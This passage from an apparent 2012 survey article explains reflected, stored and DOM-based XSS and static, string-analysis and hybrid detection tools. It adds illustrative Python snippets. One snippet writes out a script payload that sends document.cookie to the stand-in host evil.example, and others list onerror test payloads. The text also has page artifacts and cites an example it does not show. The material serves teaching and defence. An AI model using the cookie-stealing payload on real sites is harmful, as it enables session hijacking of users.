Injection methods

Depending on how HTML pages reference user inputs, XSS exploits can be broadly classified as reflected, stored, or DOM-based.

Reflected or nonpersistent XSS holes are present when a Web application server program references user input directly in the outgoing webpage. This type of XSS exploit is common in error messages and search results. The XSSed project (http://xssed.com) recently reported multiple reflected XSS holes in McAfee that attackers could exploit to trick users into downloading viruses.

Stored or persistent XSS holes exist when a server program stores user input containing injected code in a persistent data store such as a database and later references it in a webpage. Attacks against social networking sites commonly exploit this type of XSS flaw. An example is the Samy worm (www.securityfocus.com/brief/18), which, within less than 24 hours of its release on 4 October 2005, caused exponential growth of friend lists for 1 million MySpace users, effectively creating a DoS attack.

Both reflected and stored XSS holes result from improper handling of user inputs in server-side scripts. In contrast, DOM-based XSS holes appear when client-side scripts reference user inputs, dynamically obtained from the Document Object Model structure, without proper validation. Bugzilla's bug 272620 (https://bugzilla.mozilla.org/show_bug.cgi?id=272620) is an example of a DOM-based XSS exploit.
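A reflected XSS hole of the kind described above can be sketched in a few lines. The following Python snippet is purely illustrative (the `search_results_page` renderer and the evil.example URL are hypothetical, not taken from any of the reports cited here): a search-results page echoes the query back, and whether the payload executes depends entirely on whether the server entity-encodes it first.

```python
import html

def search_results_page(query: str, escape: bool = True) -> str:
    """Render a hypothetical search-results page that echoes the user's query.

    With escape=False the page reflects raw input -- a reflected XSS hole;
    with escape=True the markup is neutralized by HTML entity encoding.
    """
    shown = html.escape(query) if escape else query
    return f"<html><body>No results for: {shown}</body></html>"

# A typical cookie-stealing payload an attacker would place in a crafted link.
payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

vulnerable = search_results_page(payload, escape=False)
safe = search_results_page(payload, escape=True)

assert "<script>" in vulnerable   # payload survives intact: the browser will run it
assert "<script>" not in safe     # encoded as &lt;script&gt;: rendered as inert text
```

The same root cause underlies the stored variant; the only difference is that the payload takes a detour through a database before being referenced in a page.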
Other XSS defenses focus on identifying vulnerabilities in server-side scripts. Static-analysis-based approaches can prove the absence of vulnerabilities, but they tend to generate many false positives. Recent approaches combine static analysis with dynamic analysis techniques to improve accuracy.

Static analysis. These techniques identify tainted inputs accessed from external data sources, track the flow of tainted data, and check whether any reaches sinks such as SQL statements and HTML output statements. Benjamin Livshits and Monica Lam used binary decision diagrams to apply points-to analysis to server-side scripts; their approach requires users to specify vulnerability patterns in Program Query Language.5 Yichen Xie and Alex Aiken proposed a static analysis technique that obtains block and function summary information from symbolic execution.

Static-analysis-based techniques quickly detect potential XSS vulnerabilities in source code and are relatively easy for security personnel to implement and adopt. However, they cannot check the correctness of input sanitization functions and instead generally assume that unhandled or unknown functions return unsafe data. These approaches also miss DOM-based XSS vulnerabilities because they do not target client-side scripts.

Static string analysis. Gary Wassermann and Zhendong Su enhanced the original taint-based approaches with string analysis.8 Their technique uses context-free grammars (CFGs) to represent the values a string variable can hold at a given program point, which facilitates checking for blacklisted string values in sensitive program statements. The enhancement provides more accuracy because it can analyze string operations' effects on inputs. However, static string analysis has difficulty modeling complex operations such as string-numeric interaction; this approach can therefore produce false positives when analysts make conservative approximations in handling such operations.
Static string analysis also suffers from the limitations of blacklist comparisons.
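The blacklist limitation is easy to illustrate. The check below is a hypothetical stand-in for the kind of blacklisted-value comparison such analyses perform (it is not any published tool's actual filter): it flags values containing a script tag, but many XSS payloads need no script tag at all.

```python
# Hypothetical blacklist comparison: flag values that contain "<script".
def blacklist_flags(value: str) -> bool:
    return "<script" in value.lower()

classic = '<script>alert(1)</script>'
handler = '<img src=x onerror=alert(1)>'  # runs script via an event handler

assert blacklist_flags(classic)        # the classic payload is caught
assert not blacklist_flags(handler)    # the event-handler payload slips through
```

Because the set of dangerous strings is open-ended, any fixed blacklist leaves such gaps, which is one reason the hybrid approaches below test sanitizers dynamically rather than trusting a static pattern set.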
Combined static and dynamic analysis. Motivated by static-analysis-based approaches’ inability to identify faulty sanitization functions, Davide Balzarotti and colleagues developed the Saner tool, which checks the adequacy of sanitization functions for defending against XSS attacks.7 This successor to Pixy uses a static string analysis method similar to that proposed by Wassermann and Su to first identify the potentially faulty sanitization methods, then simulates the identified methods with a set of test inputs that contain attack strings and checks if any attack could still reach the sinks.
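The dynamic phase of such a check can be sketched as follows. This is a simplified illustration of the idea, not Saner's actual implementation: each candidate sanitizer is simulated on a small library of attack strings, and it is reported as faulty if any attack pattern survives into the sink. The sanitizers and the attack-pattern regex here are hypothetical examples.

```python
import re

# Toy attack-string library and a pattern describing payloads that would
# still execute if they reached an HTML output sink unencoded.
ATTACK_STRINGS = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
]
ATTACK_PATTERN = re.compile(r'<script|<img[^>]*onerror', re.IGNORECASE)

def weak_sanitizer(s: str) -> str:
    # Faulty: strips only the literal opening tag, once.
    return s.replace('<script>', '')

def strong_sanitizer(s: str) -> str:
    # Entity-encodes the HTML metacharacters, neutralizing both payloads.
    return s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')

def is_faulty(sanitizer) -> bool:
    """Simulate the sanitizer on every attack string; faulty if any survives."""
    return any(ATTACK_PATTERN.search(sanitizer(a)) for a in ATTACK_STRINGS)

assert is_faulty(weak_sanitizer)        # the onerror payload reaches the sink
assert not is_faulty(strong_sanitizer)  # every attack string is neutralized
```

The point of the dynamic step is precisely what purely static taint analysis cannot do: it judges a sanitizer by its observed effect on concrete attack inputs rather than by its name or its presence on a trusted list.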
MARCH 2012

Note that the program's control-flow structure (line 9 of the example) dictates that the variable new tip must contain at least 100 characters, but the CFG for new tip results in the expression .* because Wassermann and Su's approach cannot handle string-numeric interactions.

Lam and colleagues carried out points-to analysis to track the flow of tainted data in a program and then used this information to instrument the program for model-checking purposes.5 Applying the QED model checker, which is based on Java Pathfinder (http://babelfish.arc.nasa.gov/trac/jpf), they simulated the instrumented program with inputs likely to lead to a match with user-specified vulnerability patterns. This approach's effectiveness depends on the completeness of the vulnerability specifications and on QED's ability to explore as many different paths as possible.

Building on the work by Wassermann and colleagues, a team led by Adam Kiezun used concolic (concrete + symbolic) execution to capture program path constraints and a constraint solver to generate test inputs that explored various program paths.9 Upon reaching the sinks, they exercised two sets of inputs, one of ordinary valid strings and the other of attack strings from a library (http://ha.ckers.org/xss.html), and checked the differences between the resulting program behaviors.
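The final differential check can be sketched as follows. This is a simplified illustration of the comparison step only, not the actual tool: the sink is rendered once with a benign string and once with an attack string, and the two results are compared structurally; a script element (or event-handler attribute) that appears only for the attack input signals a vulnerability. The `render` function stands in for a hypothetical vulnerable sink.

```python
from html.parser import HTMLParser

def render(tip: str) -> str:
    # Hypothetical vulnerable sink: echoes input into the page unescaped.
    return f"<html><body><p>{tip}</p></body></html>"

class ScriptCounter(HTMLParser):
    """Count script elements and on* event-handler attributes in a page."""
    def __init__(self):
        super().__init__()
        self.scripts = 0
    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(k.startswith("on") for k, _ in attrs):
            self.scripts += 1

def script_count(page: str) -> int:
    counter = ScriptCounter()
    counter.feed(page)
    return counter.scripts

benign = render("great tip")
attack = render('<script>alert(1)</script>')

# A script element present only under the attack input: behaviors differ,
# so the sink is flagged as exploitable.
assert script_count(benign) == 0
assert script_count(attack) == 1
```

Comparing the two behaviors, rather than pattern-matching the output alone, is what lets this approach distinguish an input that is merely echoed as text from one that changes the structure of the resulting page.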